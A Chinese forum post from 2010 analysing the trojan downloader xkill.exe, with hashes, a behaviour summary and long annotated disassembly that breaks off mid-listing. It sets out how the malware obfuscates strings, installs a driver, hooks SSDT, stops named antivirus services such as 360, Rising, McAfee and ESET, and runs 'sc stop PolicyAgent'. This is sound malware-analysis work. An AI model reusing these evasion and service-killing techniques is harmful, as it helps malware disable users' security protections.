木马下载者Rootkit.xkill.exe分析

qiang 发表于 2010-7-21 20:35:54

本帖最后由 qiang 于 2010-7-22 21:12 编辑

文件: C:\Documents and Settings\safe\桌面\xkill.exe
大小: 74240 字节
修改时间: 2010年7月16日, 17:59:33
MD5: 9C92126F79154C2B5E6409EDD52F7E17
SHA1: 64FC169486E217813E668A5584DD27DEA7500DDE

病毒xkill.exe分析：
(1)在%Systemroot%目录下生成两个XXXXXX(随机名).dll
A.dll大小为“59,392字节”，B.dll大小为“9,728 ”字节
然后调用rundll32分别运行两个dll导出的Execute函数.
(2)A.dll运行后在%ProgramFiles%\rav\处创建CDriver.sys和CDriver.inf，然后加载该驱动.
并Hook SSDT 的ExCreateProcessEx,防止安全软件的运行.
然后遍历当前运行的进程，如果有安全软件进程，则发IRP杀之.
接着停止并删除掉以下安全软件的服务:
ZhuDongFangYu
360rp
RsRavMon
McNASvc
MpfService
McProxy
McShield
McODS
Mcmscsvc
McSysmon
Ekrn
PolicyAgent
并且查找进程是否有以下模块,有则卸掉掉:
Safemon.dll
RavExt.dll
最后删除掉CDriver.sys和CDriver.inf，unHook SSDT 的ExCreateProcessEx，退出。
(3)B.dll运行后，会连接网络下载病毒列表文件，根据列表内容下载病毒并运行。00401940 x>/$  55             push ebp                            ;  (Initial CPU selection)
00401941 |.  8BEC          mov ebp, esp
00401943 |.  81EC 20020000 sub esp, 220
00401949 |.  68 8A7F0000    push 7F8A                         ; /CursorID = OCR_APPSTARTING
0040194E |.  68 007F0000    push 7F00                         ; |/RsrcName = IDC_ARROW
00401953 |.  6A 00          push 0                            ; ||hInst = NULL
00401955 |.  FF15 28204000 call dword ptr [<&USER32.LoadCursorA>; |\LoadCursorA
0040195B |.  50             push eax                            ; |/hIcon
0040195C |.  FF15 20204000 call dword ptr [<&USER32.CopyIcon>]  ; |\CopyIcon
00401962 |.  50             push eax                            ; |hCursor
00401963 |.  FF15 24204000 call dword ptr [<&USER32.SetSystemCu>; \SetSystemCursor
00401969 |.  E8 22FDFFFF    call 00401690 //call 1
0040196E |.  E8 0DF9FFFF    call 00401280 //call 2
00401973 |.  68 04010000    push 104                            ; /BufSize = 104 (260.)
00401978 |.  8D85 F0FDFFFF lea eax,                ; |
0040197E |.  50             push eax                            ; |PathBuffer
0040197F |.  6A 00          push 0                            ; |hModule = NULL
00401981 |.  FF15 18204000 call dword ptr [<&KERNEL32.GetModule>; \GetModuleFileNameA
00401987 |.  68 04010000    push 104                            ; /BufSize = 104 (260.)
0040198C |.  8D8D F8FEFFFF lea ecx,                ; |
00401992 |.  51             push ecx                            ; |Buffer
00401993 |.  FF15 00204000 call dword ptr [<&KERNEL32.GetSystem>; \GetSystemDirectoryA
00401999 |.  C685 E0FDFFFF 5>mov byte ptr , 5C \
004019A0 |.  C685 E1FDFFFF 5>mov byte ptr , 5C \
004019A7 |.  C685 E2FDFFFF 7>mov byte ptr , 73 \\s
004019AE |.  C685 E3FDFFFF 7>mov byte ptr , 79 \\y
004019B5 |.  C685 E4FDFFFF 7>mov byte ptr , 73 \\s
004019BC |.  C685 E5FDFFFF 7>mov byte ptr , 74 \\t
004019C3 |.  C685 E6FDFFFF 6>mov byte ptr , 65 \\e
004019CA |.  C685 E7FDFFFF 6>mov byte ptr , 6D \\m
004019D1 |.  C685 E8FDFFFF 2>mov byte ptr , 2E \\.
004019D8 |.  C685 E9FDFFFF 6>mov byte ptr , 65 \\e
004019DF |.  C685 EAFDFFFF 7>mov byte ptr , 78 \\x
004019E6 |.  C685 EBFDFFFF 6>mov byte ptr , 65 \\e
004019ED |.  C685 ECFDFFFF 0>mov byte ptr , 0 \\
004019F4 |.  8D95 E0FDFFFF lea edx,
004019FA |.  52             push edx                            ; /StringToAdd
004019FB |.  8D85 F8FEFFFF lea eax,                ; |
00401A01 |.  50             push eax                            ; |ConcatString
00401A02 |.  FF15 04204000 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA//字符连接
00401A08 |.  6A 01          push 1                            ; /Flags = REPLACE_EXISTING//标志位
00401A0A |.  8D8D F8FEFFFF lea ecx,                ; |
00401A10 |.  51             push ecx                            ; |NewName
00401A11 |.  8D95 F0FDFFFF lea edx,                ; |
00401A17 |.  52             push edx                            ; |ExistingName
00401A18 |.  FF15 10204000 call dword ptr [<&KERNEL32.MoveFileE>; \MoveFileExA //复制自身到C:\WINDOWS\system32\\system.exe
00401A1E |.  6A 00          push 0                            ; /ExitCode = 0
00401A20 \.  FF15 0C204000 call dword ptr [<&KERNEL32.ExitProce>; \ExitProcess进入call 1,作用：调用rundll32分别运行两个dll导出的Execute函数，所用API均为动态解析,字符加密处理。call 2和call 1类似。00401690 /$  55             push ebp
00401691 |.  8BEC          mov ebp, esp
00401693 |.  81EC C4020000 sub esp, 2C4
00401699 |.  68 81694C21    push 214C6981
0040169E |.  E8 4DFBFFFF    call <获取API地址函数> //动态解析所用API函数
004016A3 |.  83C4 04       add esp, 4
004016A6 |.  8945 E4       mov , eax
004016A9 |.  68 04010000    push 104
004016AE |.  8D85 48FDFFFF lea eax,
004016B4 |.  50             push eax
004016B5 |.  FF55 E4       call                ;  kernel32.GetSystemDirectoryA
004016B8 |.  68 A08D361C    push 1C368DA0
004016BD |.  E8 2EFBFFFF    call <获取API地址函数>
004016C2 |.  83C4 04       add esp, 4
004016C5 |.  8945 EC       mov , eax
004016C8 |.  FF55 EC       call                ;  kernel32.GetTickCount
004016CB |.  50             push eax
004016CC |.  6A 00          push 0
004016CE |.  8D8D A8FEFFFF lea ecx,
004016D4 |.  51             push ecx
004016D5 |.  E8 26F9FFFF    call <获取随机数>
004016DA |.  83C4 0C       add esp, 0C
004016DD |.  C645 E8 5C    mov byte ptr , 5C
004016E1 |.  C645 E9 00    mov byte ptr , 0
004016E5 |.  C685 BCFEFFFF 2>mov byte ptr , 2E
004016EC |.  C685 BDFEFFFF 6>mov byte ptr , 64    ;  //64对应字符d
004016F3 |.  C685 BEFEFFFF 6>mov byte ptr , 6C    ;  //6C对应字符l
004016FA |.  C685 BFFEFFFF 6>mov byte ptr , 6C    ;  //6C对应字符l
00401701 |.  C685 C0FEFFFF 0>mov byte ptr , 0
00401708 |.  8D55 E8       lea edx,
0040170B |.  52             push edx
0040170C |.  8D85 48FDFFFF lea eax,
00401712 |.  50             push eax
00401713 |.  E8 B8030000    call <字符处理函数>                ;  //这里处理出来C:\WINDOWS\system32\
00401718 |.  83C4 08       add esp, 8
0040171B |.  8D8D A8FEFFFF lea ecx,
00401721 |.  51             push ecx
00401722 |.  8D95 48FDFFFF lea edx,
00401728 |.  52             push edx
00401729 |.  E8 A2030000    call <字符处理函数>                ;  //这里处理出来C:\WINDOWS\system32\whdjwx
0040172E |.  83C4 08       add esp, 8
00401731 |.  8D85 BCFEFFFF lea eax,
00401737 |.  50             push eax
00401738 |.  8D8D 48FDFFFF lea ecx,
0040173E |.  51             push ecx
0040173F |.  E8 8C030000    call <字符处理函数>                ;  //这里处理出来C:\WINDOWS\system32\whdjwx.dll
00401744 |.  83C4 08       add esp, 8
00401747 |.  68 43081E4E    push 4E1E0843
0040174C |.  E8 9FFAFFFF    call <获取API地址函数>
00401751 |.  83C4 04       add esp, 4
00401754 |.  8985 5CFEFFFF mov , eax
0040175A |.  6A 00          push 0
0040175C |.  68 80000000    push 80
00401761 |.  6A 02          push 2
00401763 |.  6A 00          push 0
00401765 |.  6A 00          push 0
00401767 |.  68 00000010    push 10000000
0040176C |.  8D95 48FDFFFF lea edx,
00401772 |.  52             push edx
00401773 |.  FF95 5CFEFFFF call             ;  kernel32.CreateFileA，//创建whdjwx.dll文件,文件名随机
00401779 |.  8985 C4FEFFFF mov , eax
0040177F |.  83BD C4FEFFFF F>cmp , -1
00401786 |.  74 5D          je short 004017E5
00401788 |.  C785 44FDFFFF 0>mov , 0
00401792 |.  68 27A66374    push 7463A627
00401797 |.  E8 54FAFFFF    call <获取API地址函数>
0040179C |.  83C4 04       add esp, 4
0040179F |.  8985 3CFDFFFF mov , eax
004017A5 |.  6A 00          push 0
004017A7 |.  8D85 44FDFFFF lea eax,
004017AD |.  50             push eax
004017AE |.  68 00E80000    push 0E800
004017B3 |.  68 00304000    push 00403000
004017B8 |.  8B8D C4FEFFFF mov ecx,
004017BE |.  51             push ecx
004017BF |.  FF95 3CFDFFFF call             ;  kernel32.WriteFile，//写文件
004017C5 |.  68 28FBEB70    push 70EBFB28
004017CA |.  E8 21FAFFFF    call <获取API地址函数>
004017CF |.  83C4 04       add esp, 4
004017D2 |.  8985 40FDFFFF mov , eax
004017D8 |.  8B95 C4FEFFFF mov edx,
004017DE |.  52             push edx
004017DF |.  FF95 40FDFFFF call             ;  kernel32.CloseHandle，//关闭文件句柄
004017E5 |>  C685 50FEFFFF 6>mov byte ptr , 60
004017EC |.  C685 51FEFFFF 4>mov byte ptr , 47
004017F3 |.  C685 52FEFFFF 5>mov byte ptr , 5C
004017FA |.  C685 53FEFFFF 5>mov byte ptr , 56
00401801 |.  C685 54FEFFFF 5>mov byte ptr , 5E
00401808 |.  C685 55FEFFFF 5>mov byte ptr , 5E
0040180F |.  C685 56FEFFFF 0>mov byte ptr , 1
00401816 |.  C685 57FEFFFF 0>mov byte ptr , 0
0040181D |.  C685 58FEFFFF 1>mov byte ptr , 12
00401824 |.  C685 59FEFFFF 3>mov byte ptr , 32
0040182B |.  6A 32          push 32
0040182D |.  6A 0A          push 0A
0040182F |.  8D85 50FEFFFF lea eax,
00401835 |.  50             push eax
00401836 |.  8D8D 50FEFFFF lea ecx,
0040183C |.  51             push ecx                      ;  //解密字符长度
0040183D |.  E8 FEF9FFFF    call <字符解密函数>                ;  //`G\V^^.2经过解密出来是Rundll32 .
00401842 |.  83C4 10       add esp, 10
00401845 |.  C645 F0 20    mov byte ptr , 20
00401849 |.  C645 F1 45    mov byte ptr , 45
0040184D |.  C645 F2 78    mov byte ptr , 78
00401851 |.  C645 F3 75    mov byte ptr , 75
00401855 |.  C645 F4 63    mov byte ptr , 63
00401859 |.  C645 F5 75    mov byte ptr , 75
0040185D |.  C645 F6 74    mov byte ptr , 74
00401861 |.  C645 F7 65    mov byte ptr , 65
00401865 |.  C645 F8 00    mov byte ptr , 0
00401869 |.  6A 44          push 44
0040186B |.  6A 00          push 0
0040186D |.  8D95 60FEFFFF lea edx,          ;  //把要解密的字符地址0012FD88存入edx
00401873 |.  52             push edx
00401874 |.  E8 A7F9FFFF    call 00401220
00401879 |.  83C4 0C       add esp, 0C
0040187C |.  C785 60FEFFFF 4>mov , 44
00401886 |.  6A 10          push 10
00401888 |.  6A 00          push 0
0040188A |.  8D85 C8FEFFFF lea eax,
00401890 |.  50             push eax
00401891 |.  E8 8AF9FFFF    call 00401220
00401896 |.  83C4 0C       add esp, 0C
00401899 |.  8D4D F0       lea ecx,
0040189C |.  51             push ecx
0040189D |.  8D95 48FDFFFF lea edx,
004018A3 |.  52             push edx
004018A4 |.  E8 27020000    call <字符处理函数>                ; //C:\WINDOWS\system32\whdjwx.dll Exucute
004018A9 |.  83C4 08       add esp, 8
004018AC |.  8D85 50FEFFFF lea eax,
004018B2 |.  50             push eax
004018B3 |.  8D8D D8FEFFFF lea ecx,
004018B9 |.  51             push ecx
004018BA |.  E8 01020000    call 00401AC0
004018BF |.  83C4 08       add esp, 8
004018C2 |.  8D95 48FDFFFF lea edx,
004018C8 |.  52             push edx
004018C9 |.  8D85 D8FEFFFF lea eax,
004018CF |.  50             push eax
004018D0 |.  E8 FB010000    call <字符处理函数>                ;  //Rundll32 C:\WINDOWS\system32\whdjwx.dll Exucute
004018D5 |.  83C4 08       add esp, 8
004018D8 |.  8D8D 48FDFFFF lea ecx,
004018DE |.  51             push ecx
004018DF |.  E8 4C010000    call 00401A30
004018E4 |.  83C4 04       add esp, 4
004018E7 |.  68 D621E600    push 0E621D6
004018EC |.  E8 FFF8FFFF    call <获取API地址函数>
004018F1 |.  83C4 04       add esp, 4
004018F4 |.  8945 FC       mov , eax
004018F7 |.  8D95 C8FEFFFF lea edx,
004018FD |.  52             push edx
004018FE |.  8D85 60FEFFFF lea eax,
00401904 |.  50             push eax
00401905 |.  6A 00          push 0
00401907 |.  6A 00          push 0
00401909 |.  6A 00          push 0
0040190B |.  6A 00          push 0
0040190D |.  6A 00          push 0
0040190F |.  6A 00          push 0
00401911 |.  8D8D D8FEFFFF lea ecx,
00401917 |.  51             push ecx
00401918 |.  6A 00          push 0                         ;  调用rundll32运行dll导出的Execute函数
0040191A |.  FF55 FC       call                ;  kernel32.CreateProcessA
0040191D |.  68 60EA0000    push 0EA60                   ; /Timeout = 60000. ms
00401922 |.  8B95 CCFEFFFF mov edx,          ; |
00401928 |.  52             push edx                      ; |hObject
00401929 |.  FF15 14204000 call dword ptr [<&KERNEL32.Wait>; \WaitForSingleObject
0040192F |.  8BE5          mov esp, ebp
00401931 |.  5D             pop ebp
00401932 \.  C3             retnA.dll的主要来分析其导出Execute函数：大小为“59,392字节”10002AC0 t>/$  55             push ebp
10002AC1 |.  8BEC          mov ebp, esp
10002AC3 |.  51             push ecx
10002AC4 |.  6A 00          push 0                            ; /pThreadId = NULL
10002AC6 |.  6A 00          push 0                            ; |CreationFlags = 0
10002AC8 |.  6A 00          push 0                            ; |pThreadParm = NULL
10002ACA |.  68 B02A0010    push 10002AB0                      ; |ThreadFunction = tgret.10002AB0 //线程函数1
10002ACF |.  6A 00          push 0                            ; |StackSize = 0
10002AD1 |.  6A 00          push 0                            ; |pSecurity = NULL
10002AD3 |.  FF15 60800010 call dword ptr [<&KERNEL32.CreateThr>; \CreateThread
10002AD9 |.  8945 FC       mov , eax
10002ADC |.  6A FF          push -1                            ; /Timeout = INFINITE
10002ADE |.  8B45 FC       mov eax,                ; |
10002AE1 |.  50             push eax                            ; |hObject
10002AE2 |.  FF15 18800010 call dword ptr [<&KERNEL32.WaitForSi>; \WaitForSingleObject //等待线程结束
10002AE8 |.  8B4D FC       mov ecx,
10002AEB |.  51             push ecx                            ; /hObject
10002AEC |.  FF15 54800010 call dword ptr [<&KERNEL32.CloseHand>; \CloseHandle
10002AF2 |.  33C0          xor eax, eax
10002AF4 |.  8BE5          mov esp, ebp
10002AF6 |.  5D             pop ebp
10002AF7 \.  C3             retn//线程函数110002AB0 /.  55             push ebp
10002AB1 |.  8BEC          mov ebp, esp
10002AB3 |.  E8 28FCFFFF    call 100026E0 //关键call 3，具体作用往里面跟吧
10002AB8 |.  33C0          xor eax, eax
10002ABA |.  5D             pop ebp
10002ABB \.  C2 0400       retn 4进入关键call 3100026E0 /$  55             push ebp
100026E1 |.  8BEC          mov ebp, esp
100026E3 |.  51             push ecx
100026E4 |.  6A 00          push 0                            ; /pThreadId = NULL
100026E6 |.  6A 00          push 0                            ; |CreationFlags = 0
100026E8 |.  6A 00          push 0                            ; |pThreadParm = NULL
100026EA |.  68 F0210010    push 100021F0                      ; |ThreadFunction = tgret.100021F0 //又创建了一个线程2
100026EF |.  6A 00          push 0                            ; |StackSize = 0
100026F1 |.  6A 00          push 0                            ; |pSecurity = NULL
100026F3 |.  FF15 60800010 call dword ptr [<&KERNEL32.CreateThr>; \CreateThread//线程函数2
10002373 |.  68 04010000    push 104                            ; /BufSize = 104 (260.)
10002378 |.  8D85 E8FDFFFF lea eax,                ; |
1000237E |.  50             push eax                            ; |Buffer
1000237F |.  FF15 24800010 call dword ptr [<&KERNEL32.GetSystem>; \GetSystemDirectoryA
10002385 |.  C685 EBFDFFFF 0>mov byte ptr , 0
1000238C |.  8D8D 9CFDFFFF lea ecx,
10002392 |.  51             push ecx                            ; /StringToAdd
10002393 |.  8D95 E8FDFFFF lea edx,                ; |
10002399 |.  52             push edx                            ; |ConcatString
1000239A |.  FF15 28800010 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA
100023A0 |.  6A 00          push 0                            ; /pSecurity = NULL
100023A2 |.  8D85 E8FDFFFF lea eax,                ; |
100023A8 |.  50             push eax                            ; |Path
100023A9 |.  FF15 2C800010 call dword ptr [<&KERNEL32.CreateDir>; \CreateDirectoryA
100023AF |.  8D8D E8FDFFFF lea ecx,
100023B5 |.  51             push ecx                            ; /String2
100023B6 |.  8D95 F0FEFFFF lea edx,                ; |
100023BC |.  52             push edx                            ; |String1
100023BD |.  FF15 64800010 call dword ptr [<&KERNEL32.lstrcpyA>>; \lstrcpyA
100023C3 |.  8D85 D0FDFFFF lea eax,
100023C9 |.  50             push eax                            ; /StringToAdd //这个地址保存的字符CDriver.sys
100023CA |.  8D8D F0FEFFFF lea ecx,                ; |
100023D0 |.  51             push ecx                            ; |ConcatString //Program Files\\KAV\\
100023D1 |.  FF15 28800010 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA //连接字符串
100023D7 |.  68 00330000    push 3300                         ; /dwBytes = 3300 (13056.)//长度
100023DC |.  6A 00          push 0                            ; |dwFlags = 0
100023DE |.  FF15 1C800010 call dword ptr [<&KERNEL32.GetProces>; |[GetProcessHeap//用以获取调用过程的堆句柄
100023E4 |.  50             push eax                            ; |hHeap
100023E5 |.  FF15 80800010 call dword ptr [<&KERNEL32.HeapAlloc>; \RtlAllocateHeap
100023EB |.  8945 FC       mov , eax
100023EE |.  6A 7B          push 7B
100023F0 |.  68 00330000    push 3300
100023F5 |.  8B55 FC       mov edx,
100023F8 |.  52             push edx
100023F9 |.  68 20BB0010    push 1000BB20
100023FE |.  E8 0D050000    call 10002910
10002403 |.  83C4 10       add esp, 10
10002406 |.  68 00330000    push 3300
1000240B |.  8B45 FC       mov eax,
1000240E |.  50             push eax
1000240F |.  8D8D F0FEFFFF lea ecx,
10002415 |.  51             push ecx
10002416 |.  E8 35060000    call 10002A50 //创建文件C:\Program Files\\KAV\\CDriver.sys
1000241B |.  83C4 0C       add esp, 0C
1000241E |.  8B55 FC       mov edx,
10002421 |.  52             push edx                            ; /pMemory
10002422 |.  6A 00          push 0                            ; |Flags = 0
10002424 |.  FF15 1C800010 call dword ptr [<&KERNEL32.GetProces>; |[GetProcessHeap
1000242A |.  50             push eax                            ; |hHeap
1000242B |.  FF15 7C800010 call dword ptr [<&KERNEL32.HeapFree>>; \HeapFree//释放堆
10002431 |.  68 4D100000    push 104D                         ; /dwBytes = 104D (4173.)
10002436 |.  6A 00          push 0                            ; |dwFlags = 0
10002438 |.  FF15 1C800010 call dword ptr [<&KERNEL32.GetProces>; |[GetProcessHeap
1000243E |.  50             push eax                            ; |hHeap
1000243F |.  FF15 80800010 call dword ptr [<&KERNEL32.HeapAlloc>; \RtlAllocateHeap
10002445 |.  8945 FC       mov , eax
10002448 |.  6A 0B          push 0B
1000244A |.  68 4D100000    push 104D
1000244F |.  8B45 FC       mov eax,
10002452 |.  50             push eax
10002453 |.  68 20EE0010    push 1000EE20
10002458 |.  E8 B3040000    call 10002910 //解密函数，解密出CDriver.Inf文件内容
1000245D |.  83C4 10       add esp, 10
10002460 |.  8D8D E8FDFFFF lea ecx,
10002466 |.  51             push ecx                            ; /String2
10002467 |.  8D95 70FCFFFF lea edx,                ; |
1000246D |.  52             push edx                            ; |String1
1000246E |.  FF15 64800010 call dword ptr [<&KERNEL32.lstrcpyA>>; \lstrcpyA
10002474 |.  8D85 DCFDFFFF lea eax,
1000247A |.  50             push eax                            ; /StringToAdd
1000247B |.  8D8D 70FCFFFF lea ecx,                ; |
10002481 |.  51             push ecx                            ; |ConcatString
10002482 |.  FF15 28800010 call dword ptr [<&KERNEL32.lstrcatA>>; \lstrcatA  //字符处理
10002488 |.  68 4D100000    push 104D
1000248D |.  8B55 FC       mov edx,
10002490 |.  52             push edx
10002491 |.  8D85 70FCFFFF lea eax,
10002497 |.  50             push eax
10002498 |.  E8 B3050000    call 10002A50 //创建文件C:\Program Files\\KAV\\CDriver.Inf
1000249D |.  83C4 0C       add esp, 0C
100024A0 |.  8B4D FC       mov ecx,
100024A3 |.  51             push ecx                            ; /pMemory
100024A4 |.  6A 00          push 0                            ; |Flags = 0
100024A6 |.  FF15 1C800010 call dword ptr [<&KERNEL32.GetProces>; |[GetProcessHeap
100024AC |.  50             push eax                            ; |hHeap
100024AD |.  FF15 7C800010 call dword ptr [<&KERNEL32.HeapFree>>; \HeapFree
100024B3 |.  8D95 C0FDFFFF lea edx,
100024B9 |.  52             push edx
100024BA |.  8D85 70FCFFFF lea eax,
100024C0 |.  50             push eax
100024C1 |.  E8 1AEFFFFF    call 100013E0 //关键call 4，安装一个设备驱动程序
100024C6 |.  83C4 08       add esp, 8
100024C9 |.  E8 B2F3FFFF    call 10001880 //关键call 5 ,然后遍历当前运行的进程，如果有安全软件进程，则发IRP杀之.
100024CE |.  8D8D 70FCFFFF lea ecx,
100024D4 |.  51             push ecx
100024D5 |.  E8 F6F2FFFF    call 100017D0 //卸载一个设备驱动程序
100024DA |.  83C4 04       add esp, 4
100024DD |.  8D95 F0FEFFFF lea edx,
100024E3 |.  52             push edx                            ; /FileName
100024E4 |.  FF15 5C800010 call dword ptr [<&KERNEL32.DeleteFil>; \DeleteFileA //删除文件
100024EA |.  8D85 70FCFFFF lea eax,
100024F0 |.  50             push eax                            ; /FileName
100024F1 |.  FF15 5C800010 call dword ptr [<&KERNEL32.DeleteFil>; \DeleteFileA
100024F7 |.  8D8D E8FDFFFF lea ecx,
100024FD |.  51             push ecx                            ; /Path
100024FE |.  FF15 38800010 call dword ptr [<&KERNEL32.RemoveDir>; \RemoveDirectoryA
10002504 |.  C685 90FDFFFF 6>mov byte ptr , 6F
1000250B |.  C685 91FDFFFF 7>mov byte ptr , 70
10002512 |.  C685 92FDFFFF 6>mov byte ptr , 65
10002519 |.  C685 93FDFFFF 6>mov byte ptr , 6E
10002520 |.  C685 94FDFFFF 0>mov byte ptr , 0
10002527 |.  C685 CCFDFFFF 7>mov byte ptr , 73
1000252E |.  C685 CDFDFFFF 6>mov byte ptr , 63
10002535 |.  C685 CEFDFFFF 0>mov byte ptr , 0
1000253C |.  C685 7CFDFFFF 7>mov byte ptr , 73
10002543 |.  C685 7DFDFFFF 7>mov byte ptr , 74
1000254A |.  C685 7EFDFFFF 6>mov byte ptr , 6F
10002551 |.  C685 7FFDFFFF 7>mov byte ptr , 70
10002558 |.  C685 80FDFFFF 2>mov byte ptr , 20
1000255F |.  C685 81FDFFFF 5>mov byte ptr , 50
10002566 |.  C685 82FDFFFF 6>mov byte ptr , 6F
1000256D |.  C685 83FDFFFF 6>mov byte ptr , 6C
10002574 |.  C685 84FDFFFF 6>mov byte ptr , 69
1000257B |.  C685 85FDFFFF 6>mov byte ptr , 63
10002582 |.  C685 86FDFFFF 7>mov byte ptr , 79
10002589 |.  C685 87FDFFFF 4>mov byte ptr , 41
10002590 |.  C685 88FDFFFF 6>mov byte ptr , 67
10002597 |.  C685 89FDFFFF 6>mov byte ptr , 65
1000259E |.  C685 8AFDFFFF 6>mov byte ptr , 6E
100025A5 |.  C685 8BFDFFFF 7>mov byte ptr , 74
100025AC |.  C685 8CFDFFFF 0>mov byte ptr , 0
100025B3 |.  C685 B4FDFFFF 7>mov byte ptr , 73
100025BA |.  C685 B5FDFFFF 6>mov byte ptr , 68
100025C1 |.  C685 B6FDFFFF 6>mov byte ptr , 65
100025C8 |.  C685 B7FDFFFF 6>mov byte ptr , 6C
100025CF |.  C685 B8FDFFFF 6>mov byte ptr , 6C
100025D6 |.  C685 B9FDFFFF 3>mov byte ptr , 33
100025DD |.  C685 BAFDFFFF 3>mov byte ptr , 32
100025E4 |.  C685 BBFDFFFF 2>mov byte ptr , 2E
100025EB |.  C685 BCFDFFFF 6>mov byte ptr , 64
100025F2 |.  C685 BDFDFFFF 6>mov byte ptr , 6C
100025F9 |.  C685 BEFDFFFF 6>mov byte ptr , 6C
10002600 |.  C685 BFFDFFFF 0>mov byte ptr , 0
10002607 |.  8D95 B4FDFFFF lea edx,
1000260D |.  52             push edx                            ; /pModule
1000260E |.  FF15 4C800010 call dword ptr [<&KERNEL32.GetModule>; \GetModuleHandleA
10002614 |.  8985 98FDFFFF mov , eax
1000261A |.  83BD 98FDFFFF 0>cmp , 0
10002621 |.  75 13          jnz short 10002636
10002623 |.  8D85 B4FDFFFF lea eax,
10002629 |.  50             push eax                            ; /FileName
1000262A |.  FF15 3C800010 call dword ptr [<&KERNEL32.LoadLibra>; \LoadLibraryA
10002630 |.  8985 98FDFFFF mov , eax
10002636 |>  C685 60FCFFFF 5>mov byte ptr , 53
1000263D |.  C685 61FCFFFF 6>mov byte ptr , 68
10002644 |.  C685 62FCFFFF 6>mov byte ptr , 65
1000264B |.  C685 63FCFFFF 6>mov byte ptr , 6C
10002652 |.  C685 64FCFFFF 6>mov byte ptr , 6C
10002659 |.  C685 65FCFFFF 4>mov byte ptr , 45
10002660 |.  C685 66FCFFFF 7>mov byte ptr , 78
10002667 |.  C685 67FCFFFF 6>mov byte ptr , 65
1000266E |.  C685 68FCFFFF 6>mov byte ptr , 63
10002675 |.  C685 69FCFFFF 7>mov byte ptr , 75
1000267C |.  C685 6AFCFFFF 7>mov byte ptr , 74
10002683 |.  C685 6BFCFFFF 6>mov byte ptr , 65
1000268A |.  C685 6CFCFFFF 4>mov byte ptr , 41
10002691 |.  C685 6DFCFFFF 0>mov byte ptr , 0
10002698 |.  8D8D 60FCFFFF lea ecx,
1000269E |.  51             push ecx                            ; /ProcNameOrOrdinal
1000269F |.  8B95 98FDFFFF mov edx,                ; |
100026A5 |.  52             push edx                            ; |hModule
100026A6 |.  FF15 34800010 call dword ptr [<&KERNEL32.GetProcAd>; \GetProcAddress
100026AC |.  8945 F8       mov , eax
100026AF |.  6A 00          push 0
100026B1 |.  6A 00          push 0
100026B3 |.  8D85 7CFDFFFF lea eax,
100026B9 |.  50             push eax //"stop PolicyAgent"
100026BA |.  8D8D CCFDFFFF lea ecx,
100026C0 |.  51             push ecx //sc
100026C1 |.  8D95 90FDFFFF lea edx,
100026C7 |.  52             push edx
100026C8 |.  6A 00          push 0
100026CA |.  FF55 F8       call //  shell32.ShellExecuteA ,关闭PolicyAgent
100026CD |.  33C0          xor eax, eax
100026CF |.  8BE5          mov esp, ebp
100026D1 |.  5D             pop ebp
100026D2 \.  C2 0400       retn 4关键call 4,安装一个设备驱动程序100013E0 /$  55             push ebp
100013E1 |.  8BEC          mov ebp, esp
100013E3 |.  81EC 80000000 sub esp, 80
100013E9 |.  8B45 0C       mov eax,
100013EC |.  50             push eax
100013ED |.  E8 0EFCFFFF    call 10001000
100013F2 |.  83C4 04       add esp, 4
100013F5 |.  0FB6C8       movzx ecx, al
100013F8 |.  85C9          test ecx, ecx
100013FA |.  0F85 AC000000 jnz 100014AC
10001400 |.  6A 00          push 0
10001402 |.  6A 14          push 14
10001404 |.  8D55 80       lea edx,
10001407 |.  52             push edx
10001408 |.  8D45 B4       lea eax,
1000140B |.  50             push eax
1000140C |.  8B4D 08       mov ecx,
1000140F |.  51             push ecx
10001410 |.  FF15 58810010 call dword ptr [<&SETUPAPI.SetupDiGe>;  setupapi.SetupDiGetINFClassA //获取GUID
10001416 |.  6A 00          push 0
10001418 |.  6A 00          push 0
1000141A |.  6A 00          push 0
1000141C |.  8D55 B4       lea edx,
1000141F |.  52             push edx
10001420 |.  FF15 6C810010 call dword ptr [<&SETUPAPI.SetupDiCr>;  setupapi.SetupDiCreateDeviceInfoListExA//创建设备信息块函数
10001426 |.  8945 F8       mov , eax
10001429 |.  837D F8 FF    cmp , -1
1000142D |.  75 07          jnz short 10001436
1000142F |.  32C0          xor al, al
10001431 |.  E9 8D010000    jmp 100015C3
10001436 |>  C745 94 1C00000>mov , 1C
1000143D |.  8D45 94       lea eax,
10001440 |.  50             push eax
10001441 |.  6A 01          push 1
10001443 |.  6A 00          push 0
10001445 |.  6A 00          push 0
10001447 |.  8D4D B4       lea ecx,
1000144A |.  51             push ecx
1000144B |.  8D55 80       lea edx,
1000144E |.  52             push edx
1000144F |.  8B45 F8       mov eax,
10001452 |.  50             push eax
10001453 |.  FF15 68810010 call dword ptr [<&SETUPAPI.SetupDiCr>;  setupapi.SetupDiCreateDeviceInfoA//创建设备信息块
10001459 |.  85C0          test eax, eax
1000145B |.  75 07          jnz short 10001464
1000145D |.  32C0          xor al, al
1000145F |.  E9 5F010000    jmp 100015C3
10001464 |>  8B4D 0C       mov ecx,
10001467 |.  51             push ecx                            ; /String= //"*CDriver"
10001468 |.  FF15 84800010 call dword ptr [<&KERNEL32.lstrlenA>>; \lstrlenA
1000146E |.  83C0 02       add eax, 2
10001471 |.  50             push eax
10001472 |.  8B55 0C       mov edx,
10001475 |.  52             push edx
10001476 |.  6A 01          push 1
10001478 |.  8D45 94       lea eax,
1000147B |.  50             push eax
1000147C |.  8B4D F8       mov ecx,
1000147F |.  51             push ecx
10001480 |.  FF15 74810010 call dword ptr [<&SETUPAPI.SetupDiSe>;  setupapi.SetupDiSetDeviceRegistryPropertyA//设置设备在系统设备树上的路径
10001486 |.  85C0          test eax, eax
10001488 |.  75 07          jnz short 10001491
1000148A |.  32C0          xor al, al
1000148C |.  E9 32010000    jmp 100015C3
10001491 |>  8D55 94       lea edx,
10001494 |.  52             push edx
10001495 |.  8B45 F8       mov eax,
10001498 |.  50             push eax
10001499 |.  6A 19          push 19
1000149B |.  FF15 70810010 call dword ptr [<&SETUPAPI.SetupDiCa>;  setupapi.SetupDiCallClassInstaller//注册
100014A1 |.  85C0          test eax, eax
100014A3 |.  75 07          jnz short 100014AC
100014A5 |.  32C0          xor al, al
100014A7 |.  E9 17010000    jmp 100015C3
100014AC |>  C745 FC 0000000>mov , 0
100014B3 |.  C645 C4 6E    mov byte ptr , 6E
100014B7 |.  C645 C5 65    mov byte ptr , 65
100014BB |.  C645 C6 77    mov byte ptr , 77
100014BF |.  C645 C7 64    mov byte ptr , 64
